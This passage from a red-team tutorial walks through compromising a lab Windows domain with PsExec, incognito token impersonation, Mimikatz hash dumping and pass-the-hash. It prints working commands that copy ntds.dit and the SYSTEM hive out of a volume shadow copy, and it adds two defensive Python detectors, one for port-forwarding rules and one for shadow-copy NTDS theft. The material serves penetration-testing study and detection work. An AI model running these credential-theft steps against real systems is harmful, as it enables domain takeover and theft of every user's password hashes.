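    be a /prefix (constructed assumption; use the host's real netmask)."""
    findings = []
    for laddr, lport, caddr, cport in rules:
        reasons = []
        if cport in LATERAL_PORTS:
            reasons.append(f"forwards to {LATERAL_PORTS[cport]} ({cport})")
        try:
            listen_net = ipaddress.ip_network(f"{laddr}/{prefix}", strict=False)
            if ipaddress.ip_address(caddr) not in listen_net:
                reasons.append(f"bridges {listen_net} to {caddr}")
        except ValueError:
            reasons.append("unparseable address, review manually")
        findings.append({"listen": f"{laddr}:{lport}",
                         "connect": f"{caddr}:{cport}", "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in assess(parse_portproxy(SAMPLE)):
        print(f["listen"], "->", f["connect"], "|", "; ".join(f["reasons"]) or "no flags")
```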
Pure Windows?:
Unfortunately I could not find a way, if the attacker is on a Windows box, to make this work natively. The issue is that tools like Sysinternals PsExec won't query non-default ports. Additionally, if the attacker's machine has port 445 open it will ignore any port forwarding rules which we configure (eg: 127.0.0.1:445 --> 10.0.0.129:5678). Temporarily disabling SMB is also not an option; it requires reconfiguring dependencies and rebooting the machine (Yikes!). If anyone knows any voodoo that will work, please leave a comment below!
In this situation your best option will be to modify and compile Impacket's PsExec using pyinstaller, similar to what maaaaz has done here.
Smash-And-Grab ²
This may or may not be similar to our first scenario, depending on how REDHOOK\Administrator has authenticated to "Client 2". For example, if a simple "net use \\10.1.1.3\C$" command was issued then we would not be able to get clear text credentials or a hash; however, "net use \\10.1.1.3\C$ /user:REDHOOK\Administrator XXXXXXX" would give us both. In essence, it depends on whether the REDHOOK\Administrator user actually typed in their credentials when authenticating.
Keep in mind that either way it will most likely be game over. Even if we can't get clear text credentials we will still be able to find a process running as REDHOOK\Administrator and impersonate its token using incognito.
Metasploit Easy-Mode (Mimikatz & hashdump & incognito):
We were lucky in this case, or not so much as I've done it on purpose hehe! Let's briefly have a look at incognito though, just to cover our bases.
Impacket (PsExec) & incognito:
Again we have some limitations here because of the pivot. To illustrate the technique I'll show how we can use incognito on the remote host, as it is a bit user unfriendly (unlike Invoke-Mimikatz).
After running the command our shell hangs (sigh..). I played around with this for quite a bit and I found that without the "-c" (interactive mode) parameter the shell does not hang but the command does not execute correctly; also, if you don't group your commands in a bat file then it will only execute the first one before hanging. Just to be clear, this issue only happens when executing incognito through PsExec.
Although it is quite an ugly solution, once we log back in to the machine we can see that our batch script ran correctly.
If anyone can figure out a more elegant way to execute the incognito command, definitely leave a comment!
File Transfers:
Obviously I have gone a bit easy on myself, using the "put" command in Impacket's PsExec. Generally a good approach would be to download any files you may need onto the pivot box; you can use PowerShell's WebClient or something like bitsadmin. For some ideas, have a look at Parvez's post here. Once the files are in place you can just create an unrestricted Windows share and mount that from the host behind the pivot. You can see some example syntax below.
# Create an unrestricted share.
C:\Users\asenath.waite> md C:\Users\asenath.waite\Desktop\test
C:\Users\asenath.waite> echo Hello > C:\Users\asenath.waite\Desktop\test\test.txt
C:\Users\asenath.waite> net share SomeShare=C:\Users\asenath.waite\Desktop\test /grant:everyone,full
SomeShare was shared successfully.

C:\Users\asenath.waite> net share

Share name   Resource                              Remark
-------------------------------------------------------------------------------
C$           C:\                                   Default share
IPC$                                               Remote IPC
ADMIN$       C:\Windows                            Remote Admin
SomeShare    C:\Users\asenath.waite\Desktop\test
The command completed successfully.

# On the remote host simply mount the share.
C:\Users\belial> net use \\10.0.0.129\SomeShare
The command completed successfully.

C:\Users\belial> type \\10.0.0.129\SomeShare\test.txt
Hello

# Unmount.
C:\Users\belial> net use \\10.0.0.129\SomeShare /delete
\\10.0.0.129\SomeShare was deleted successfully.

# Clean up the share.
C:\Users\asenath.waite> net share C:\Users\asenath.waite\Desktop\test /delete /yes
Users have open files on SomeShare. Continuing the operation will force the files closed.
SomeShare was deleted successfully.

C:\Users\asenath.waite> rd /S /Q C:\Users\asenath.waite\Desktop\test
Compromising Redrum-DC
At this point we have either found plain text credentials for REDHOOK\Administrator or created our own Domain Admin, which means that compromising the DC will be exactly the same as the process we used for "Client 2". To save my fingers some typing I won't go over the entire scenario again; you can mix and match a number of techniques which were shown previously. The two examples below are, again, doing something slightly different than the cases we saw earlier.
Socks Proxy & Impacket (WmiExec):
Remember that socks proxy we set up earlier? We can actually proxify almost everything we need to compromise the domain. The one caveat is that this obviously requires us to set up a socks proxy on the pivot. Here we are using Impacket's WmiExec just to switch things up a bit.
Simple right? Just don't rely on it too much in case it is not an option!
Sysinternals (PsExec) & Invoke-Mimikatz:
Time to complete our initial objective and get usable credentials for the REDHOOK\redhook.DA user account. This example is using Invoke-Mimikatz's ability to dump credentials on remote machines. Essentially, we get a shell on "Client 1" as REDHOOK\Administrator and then launch Mimikatz at the DC. We are assuming here that REDHOOK\redhook.DA has an active session on the box.
The reason that I'm only dumping hashes here is that, due to enhanced protection features on 2k12 R2/Windows 8.1+, we can't get clear text credentials for authenticated users. However, from the output we can see that we have managed to retrieve the REDHOOK\redhook.DA NTLM hash, which will be more than enough to authenticate to other machines in the domain as that user.
Notice that we are just null padding the LM portion of the hash; it doesn't really matter what we put there. We are certainly not restricted to Impacket here, Metasploit's PsExec will also work fine, as will forging the NTLM hash of a command prompt using WCE or Mimikatz.
Pillaging NTDS
A lot of times extracting NTDS will be the last thing to do before rolling the Game Over credits. I highly recommend that you read Sean Metcalf's post on doing this here, which shows a number of different techniques both with local shell access to the DC as well as remotely using WMI. In this section I will briefly show two ways we can achieve this.
Volume Shadow Copy (Classic-Mode):
The most basic, living off the land, way to do this is to use vssadmin.
C:\> whoami
redhook\redhook.da

# Get the path to NTDS, it may not be in the C drive.
C:\> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
    System Schema Version    REG_DWORD    0x45
    Root Domain    REG_SZ    DC=RedHook,DC=local
    Configuration NC    REG_SZ    CN=Configuration,DC=RedHook,DC=local
    Machine DN Name    REG_SZ    CN=NTDS Settings,CN=REDRUM-DC,CN=Servers,CN=There-Be-Dragons,CN=Sites,CN=Configuration,DC=RedHook,DC=local
    DsaOptions    REG_SZ    1
    IsClone    REG_DWORD    0x0
    ServiceDll    REG_EXPAND_SZ    %systemroot%\system32\ntdsa.dll
    DSA Working Directory    REG_SZ    C:\Windows\NTDS
    DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit
    Database backup path    REG_SZ    C:\Windows\NTDS\dsadata.bak
    Database log files path    REG_SZ    C:\Windows\NTDS
    Hierarchy Table Recalculation interval (minutes)    REG_DWORD    0x2d0
    Database logging/recovery    REG_SZ    ON
    DS Drive Mappings    REG_MULTI_SZ    c:\=\\?\Volume{1c6c559b-3db6-11e5-80ba-806e6f6e6963}\
    DSA Database Epoch    REG_DWORD    0x7983
    Strict Replication Consistency    REG_DWORD    0x1
    Schema Version    REG_DWORD    0x45
    ldapserverintegrity    REG_DWORD    0x1
    Global Catalog Promotion Complete    REG_DWORD    0x1
    DSA Previous Restore Count    REG_DWORD    0x1

# Create a shadow copy of C.
C:\> vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'c:\'
    Shadow Copy ID: {e0fd5b2d-b32d-4bba-89a2-efcf0b7b8fda}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

# Copy out ntds and the system hive.
C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
        1 file(s) copied.

C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hive
        1 file(s) copied.
After getting the files back to the attacker's machine (many ways to do this, pick one hehe) we can just use Impacket's SecretsDump locally and extract the contents. The output below is truncated for brevity.
Keep in mind that NTDS can literally contain thousands of user accounts and can be very large. Also, don't go outside your remit(!), dumping NTDS is likely to make Admins go absolutely ballistic!
A very similar approach can be used with Invoke-NinjaCopy; you can see an example of this in Sean Metcalf's post.
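From the defender's side, the vssadmin sequence shown above (a shadow being created, then ntds.dit and the SYSTEM hive being read through the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path) is visible in process-creation telemetry on the DC (Sysmon event 1 or Security event 4688). The Python below is an added example, not from the post, that tags such records and reports a host only when both stages occur there; the record format and the log lines are constructed for the demonstration.

```python
import re

# Constructed process-creation records (host|user|image|command line). The
# first three mirror the vssadmin/copy sequence above; the rest are benign.
LOG = r"""
REDRUM-DC|redhook\redhook.da|C:\Windows\System32\vssadmin.exe|vssadmin create shadow /for=c:
REDRUM-DC|redhook\redhook.da|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
REDRUM-DC|redhook\redhook.da|C:\Windows\System32\cmd.exe|copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hive
REDRUM-DC|NT AUTHORITY\SYSTEM|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
WIN7-ENT-CLI1|redhook\asenath.waite|C:\Windows\System32\cmd.exe|copy C:\Users\asenath.waite\notes.txt D:\backup\
"""

# Stage 1: a shadow copy is created. "vssadmin list shadows" must not match.
SHADOW_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
# Stage 2: the AD database or the SYSTEM hive is read out of a shadow volume.
SHADOW_READ = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*?(ntds\.dit|\\config\\SYSTEM\b)", re.I)

def parse_log(text):
    """Yield dicts from 'host|user|image|cmdline' lines."""
    for line in text.strip().splitlines():
        host, user, image, cmdline = line.split("|", 3)
        yield {"host": host, "user": user, "image": image, "cmdline": cmdline}

def classify(rec):
    """Return the stage tag for a record, or None if it is not interesting."""
    if SHADOW_CREATE.search(rec["cmdline"]):
        return "shadow_create"
    m = SHADOW_READ.search(rec["cmdline"])
    if m:
        # Normalise "ntds.dit" / "\config\SYSTEM" to the bare file name.
        return "shadow_read:" + m.group(1).rsplit("\\", 1)[-1].lower()
    return None

def detect(records):
    """Group tags per host; report hosts where a shadow was created AND
    ntds.dit was read from a shadow copy (the SYSTEM hive read is extra)."""
    stages = {}
    for rec in records:
        tag = classify(rec)
        if tag:
            stages.setdefault(rec["host"], set()).add(tag)
    return {host: sorted(tags) for host, tags in stages.items()
            if "shadow_create" in tags and "shadow_read:ntds.dit" in tags}

if __name__ == "__main__":
    for host, tags in detect(parse_log(LOG)).items():
        print(f"{host}: probable NTDS extraction via shadow copy ({', '.join(tags)})")
```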
Socks Proxy & Impacket (SecretsDump) (Easy-Mode):
Again, ridiculous as it seems, if we have a socks proxy set up on the pivot we can just proxify SecretsDump and launch it against the DC using either plain text credentials or a hash!